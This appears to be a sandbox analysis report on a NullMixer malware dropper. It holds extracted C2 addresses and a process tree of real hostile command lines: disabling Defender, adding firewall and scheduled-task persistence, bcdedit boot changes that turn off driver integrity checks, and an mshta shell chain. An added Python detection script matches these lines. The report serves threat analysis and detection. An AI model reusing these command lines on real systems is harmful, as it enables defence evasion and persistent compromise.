Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    23-12-2024 20:19

General

  • Target

    65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe

  • Size

    10.6MB

  • MD5

    2d31d4fbad1650ec69c899a5417de3dd

  • SHA1

    621ba6e8907e372798440d711126f0b0a0d8ce2f

  • SHA256

    65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e

  • SHA512

    ac21c3aac43864449e0c135e9466bd368fe16131ba9bd54e754c22410d2b325f2cc525c33509c7fbab5d480d36833aa3bb08d470dec37444fbad5383e362c361

  • SSDEEP

    196608:xYLUCgA7XFU7WhMld/UnPejgM4YdJUB7vLzaDBuCUfvpQJfB/0Do05kWgX0q:x0dgkXFU7zCnPUgM4WUkBqRQ/BTkq

Malware Config

Extracted

Family

socelars

C2

http://www.ecgbg.com/

Extracted

Family

redline

Botnet

media23n

C2

65.108.69.168:16278

Attributes
  • auth_value

    187686d42fe6990103297406a32ce4af

Extracted

Family

redline

Botnet

user01new

C2

49.12.219.50:4846

Attributes
  • auth_value

    fcca1ed5af8553053dc74a4c6a9ce601

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Detect Fabookie payload 1 IoCs
  • Fabookie

    Fabookie is a Facebook account information stealer.

  • Fabookie family
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba family
  • Glupteba payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

  • Nullmixer family
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Privateloader family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 10 IoCs
  • Redline family
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars family
  • Socelars payload 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Uses the powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • ASPack v2.12-2.42 3 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 33 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Manipulates WinMon driver. 1 IoCs

    Rootkits write to the WinMon driver to hide PIDs from detection.

  • Manipulates WinMonFS driver. 1 IoCs

    Rootkits write to the WinMonFS driver to hide directories and files from detection.

  • Suspicious use of SetThreadContext 2 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 60 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
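
The signatures above are the sandbox's summary of what the process tree below actually does: Defender is switched off and the drop directory excluded with Set-MpPreference/Add-MpPreference, a copy of Glupteba is installed as C:\Windows\rss\csrss.exe (a core Windows binary name outside System32), allowed through the firewall with netsh, persisted with an ONLOGON / HIGHEST scheduled task, and patch.exe builds a new "Windows Fast Mode" boot entry with nointegritychecks 1 and recoveryenabled 0, then makes it the default with a zero-second timeout so unsigned kernel drivers load on the next boot. The Python below is an added example, not part of the sandbox report or its signature engine: it replays those command lines (constructed here from the PID / parent PID / command line triples in the Processes section; the mshta line is shortened) through a small set of detection rules and rebuilds the boot entry from the individual bcdedit calls so its net effect can be read at a glance. The rule names, the flags and the extra browser names and testsigning check are this example's own and go beyond the report's exact command lines.

```python
"""Triage of the command lines in the process tree above.

Added example, not part of the sandbox report: EVENTS is constructed from the
(PID, parent PID, command line) triples in the Processes section (the mshta
line is shortened), and the rule names, the boot-entry reconstruction and the
flags are this example's own, not the sandbox's signature engine.
"""
import re

# Constructed from the process tree above: (PID, parent PID, command line).
EVENTS = [
    (2896, 2716, r'powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable'),
    (1928, 1704, r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"'),
    (2644, 2884, r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes'),
    (1196, 1576, r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F'),
    (2320, 908, r'taskkill /f /im chrome.exe'),
    (604, 2964, r'"C:\Windows\System32\mshta.exe" VbscRIpt: CloSE ( crEatEoBjECt( "WScrIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /q /r Type ""Tue2042f82e3d3979159.exe"" > DMBV.exe && StarT DMBV.EXE" , 0 , TRuE ) )'),
    (1540, 832, r'C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER'),
    (2688, 832, r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe'),
    (1428, 832, r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0'),
    (3048, 832, r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1'),
    (1648, 832, r'C:\Windows\system32\bcdedit.exe -timeout 0'),
    (540, 832, r'C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}'),
]

# Rule names are this example's own. Patterns are case-insensitive because
# the chain mixes case freely (VbscRIpt, crEatEoBjECt) to dodge naive matching.
RULES = [
    ('defender_realtime_disabled',
     re.compile(r'Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true', re.I)),
    ('defender_cloud_reporting_disabled',
     re.compile(r'Set-MpPreference\b.*(-MAPSReporting\s+Disable|-SubmitSamplesConsent\s+NeverSend)', re.I)),
    ('defender_exclusion_added',
     re.compile(r'Add-MpPreference\b.*-Exclusion(Path|Process|Extension)\b', re.I)),
    ('firewall_allow_rule_added',
     re.compile(r'netsh\b.*advfirewall\s+firewall\s+add\s+rule\b.*action=allow', re.I)),
    ('schtasks_onlogon_highest',
     re.compile(r'schtasks\b.*/CREATE\b.*/SC\s+ONLOGON\b.*/RL\s+HIGHEST', re.I)),
    ('bcdedit_integrity_checks_off',          # testsigning added as the sibling DSE bypass
     re.compile(r'bcdedit(\.exe)?\b.*\s(nointegritychecks\s+1|testsigning\s+on)\b', re.I)),
    ('bcdedit_recovery_disabled',
     re.compile(r'bcdedit(\.exe)?\b.*\srecoveryenabled\s+0\b', re.I)),
    ('mshta_inline_vbscript_shell',
     re.compile(r'mshta(\.exe)?"?\s+vbscript:.*createobject\s*\(\s*"wscript\.shell"', re.I)),
    ('browser_killed',                        # unlocks the cookie/login DBs before theft
     re.compile(r'taskkill\b.*/im\s+(chrome|msedge|firefox|opera)\.exe', re.I)),
]

SYSTEM_DIRS = ('c:\\windows\\system32\\', 'c:\\windows\\syswow64\\')
CORE_NAMES = ('csrss.exe', 'smss.exe', 'lsass.exe', 'winlogon.exe', 'services.exe', 'svchost.exe')


def masquerading_path(cmdline):
    """Return a path that borrows a core Windows binary name but lives outside
    System32/SysWOW64 (e.g. C:\\Windows\\rss\\csrss.exe), or None."""
    for path in re.findall(r'[a-zA-Z]:\\[^"\s]+\.exe', cmdline):
        low = path.lower()
        if low.rsplit('\\', 1)[-1] in CORE_NAMES and not low.startswith(SYSTEM_DIRS):
            return path
    return None


def detect(events):
    """Apply every rule to every command line; return [(pid, rule_name), ...]."""
    hits = []
    for pid, _ppid, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((pid, name))
        if masquerading_path(cmdline):
            hits.append((pid, 'core_binary_name_outside_system32'))
    return hits


def rebuild_boot_entry(events):
    """Replay the bcdedit calls into one view of the boot entry they build."""
    entry = {'guid': None, 'description': None, 'settings': {}, 'is_default': False, 'timeout': None}
    for _pid, _ppid, cmdline in events:
        if not re.search(r'bcdedit(\.exe)?\s', cmdline, re.I):
            continue
        m = re.search(r'-create\s+(\{[0-9a-f-]+\})(?:\s+-d\s+"([^"]*)")?', cmdline, re.I)
        if m:
            entry['guid'], entry['description'] = m.group(1), m.group(2)
        m = re.search(r'-set\s+(\{[0-9a-f-]+\})\s+(\S+)\s+(\S+)', cmdline, re.I)
        if m and m.group(1) == entry['guid']:
            entry['settings'][m.group(2).lower()] = m.group(3)
        m = re.search(r'-default\s+(\{[0-9a-f-]+\})', cmdline, re.I)
        if m:
            entry['is_default'] = m.group(1) == entry['guid']
        m = re.search(r'-timeout\s+(\d+)', cmdline, re.I)
        if m:
            entry['timeout'] = int(m.group(1))
    return entry


def boot_entry_flags(entry):
    """Which properties of the rebuilt entry matter for a kernel-mode rootkit loader."""
    s, flags = entry['settings'], []
    if s.get('nointegritychecks') == '1':
        flags.append('unsigned kernel drivers will load (DSE off)')
    if s.get('recoveryenabled') == '0':
        flags.append('automatic startup repair disabled')
    if entry['is_default'] and entry['timeout'] == 0:
        flags.append('new entry boots by default with no boot menu')
    return flags


if __name__ == '__main__':
    for pid, rule in detect(EVENTS):
        print(f'PID {pid}: {rule}')
    entry = rebuild_boot_entry(EVENTS)
    print(entry['description'], entry['guid'], entry['settings'])
    for flag in boot_entry_flags(entry):
        print(' !', flag)
```

Fed real process-creation telemetry (Sysmon event 1, or 4688 with command-line auditing on) instead of the constructed list, the same rules fire on each stage of this chain independently, which matters here because the first two PowerShell calls disable the one sensor the dropper expects to be present; the bcdedit reconstruction is the check to run before rebooting a suspected host, since a default entry with nointegritychecks 1 means the dropped driver will load signed or not.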

Processes

  • C:\Users\Admin\AppData\Local\Temp\65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe
    "C:\Users\Admin\AppData\Local\Temp\65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:316
    • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2716
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2896
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1704
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1928
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Tue20acc89cbd449e95d.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:3020
        • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20acc89cbd449e95d.exe
          Tue20acc89cbd449e95d.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:2144
          • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20acc89cbd449e95d.exe
            C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20acc89cbd449e95d.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2744
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Tue20cb62eb1a4cb3a01.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2164
        • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20cb62eb1a4cb3a01.exe
          Tue20cb62eb1a4cb3a01.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:408
          • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20cb62eb1a4cb3a01.exe
            "C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20cb62eb1a4cb3a01.exe"
            5⤵
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1564
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              6⤵
                PID:2884
                • C:\Windows\system32\netsh.exe
                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                  7⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2644
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe /306-306
                6⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Manipulates WinMon driver.
                • Manipulates WinMonFS driver.
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:1576
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1196
                • C:\Windows\system32\schtasks.exe
                  schtasks /delete /tn ScheduledUpdate /f
                  7⤵
                    PID:2532
                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                    7⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    PID:832
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1540
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1156
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:668
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2944
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2688
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2052
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1428
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:388
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:3048
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1656
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2144
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -timeout 0
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1648
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:540
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\Sysnative\bcdedit.exe /v
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2188
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    7⤵
                    • Executes dropped EXE
                    PID:2164
                  • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1704
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue2032d2e78e3d4a56.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2472
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2032d2e78e3d4a56.exe
              Tue2032d2e78e3d4a56.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1644
              • C:\Users\Admin\AppData\Local\Temp\is-D03EQ.tmp\Tue2032d2e78e3d4a56.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-D03EQ.tmp\Tue2032d2e78e3d4a56.tmp" /SL5="$8019C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2032d2e78e3d4a56.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:320
                • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2032d2e78e3d4a56.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2032d2e78e3d4a56.exe" /SILENT
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2328
                  • C:\Users\Admin\AppData\Local\Temp\is-6CLTF.tmp\Tue2032d2e78e3d4a56.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-6CLTF.tmp\Tue2032d2e78e3d4a56.tmp" /SL5="$601D8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2032d2e78e3d4a56.exe" /SILENT
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: GetForegroundWindowSpam
                    PID:2036
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue202def121e32deb35.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2824
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue202def121e32deb35.exe
              Tue202def121e32deb35.exe
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1540
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 272
                5⤵
                • Program crash
                PID:348
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue20177cabec2a.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:3036
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20177cabec2a.exe
              Tue20177cabec2a.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2656
              • C:\Users\Admin\AppData\Local\Temp\is-C47EJ.tmp\Tue20177cabec2a.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-C47EJ.tmp\Tue20177cabec2a.tmp" /SL5="$80190,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20177cabec2a.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2556
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue205ff5cb98.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:592
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue205ff5cb98.exe
              Tue205ff5cb98.exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2772
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue2069ccb821.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:984
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2069ccb821.exe
              Tue2069ccb821.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1744
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue207aa8a73892eeac.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2080
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue207aa8a73892eeac.exe
              Tue207aa8a73892eeac.exe
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:768
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                5⤵
                • System Location Discovery: System Language Discovery
                PID:908
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2320
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue2089e53e7fc7158da.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1848
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2089e53e7fc7158da.exe
              Tue2089e53e7fc7158da.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1156
              • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2089e53e7fc7158da.exe
                C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2089e53e7fc7158da.exe
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2724
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Tue2042f82e3d3979159.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:544
            • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2042f82e3d3979159.exe
              Tue2042f82e3d3979159.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2964
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\System32\mshta.exe" VbscRIpt: CloSE ( crEatEoBjECt( "WScrIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /q /r Type ""C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2042f82e3d3979159.exe"" > DMBV.exe && StarT DMBV.EXE /pHimz7Zg2S6 & IF """" == """" for %G IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2042f82e3d3979159.exe"" ) do taskkill /f -im ""%~nxG""" , 0 , TRuE ) )
                5⤵
                • System Location Discovery: System Language Discovery
                PID:604
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /q /r Type "C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2042f82e3d3979159.exe" > DMBV.exe && StarT DMBV.EXE /pHimz7Zg2S6 & IF "" =="" for %G IN ("C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2042f82e3d3979159.exe" ) do taskkill /f -im "%~nxG"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2128
                  • C:\Users\Admin\AppData\Local\Temp\DMBV.exe
                    DMBV.EXE /pHimz7Zg2S6
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2796
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\System32\mshta.exe" VbscRIpt: CloSE ( crEatEoBjECt( "WScrIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /q /r Type ""C:\Users\Admin\AppData\Local\Temp\DMBV.exe"" > DMBV.exe && StarT DMBV.EXE /pHimz7Zg2S6 & IF ""/pHimz7Zg2S6 "" == """" for %G IN ( ""C:\Users\Admin\AppData\Local\Temp\DMBV.exe"" ) do taskkill /f -im ""%~nxG""" , 0 , TRuE ) )
                      8⤵
                      • System Location Discovery: System Language Discovery
                      • Modifies Internet Explorer settings
                      PID:2720
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /q /r Type "C:\Users\Admin\AppData\Local\Temp\DMBV.exe" > DMBV.exe && StarT DMBV.EXE /pHimz7Zg2S6 & IF "/pHimz7Zg2S6 " =="" for %G IN ("C:\Users\Admin\AppData\Local\Temp\DMBV.exe" ) do taskkill /f -im "%~nxG"
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:2620
                    • C:\Windows\SysWOW64\mshta.exe
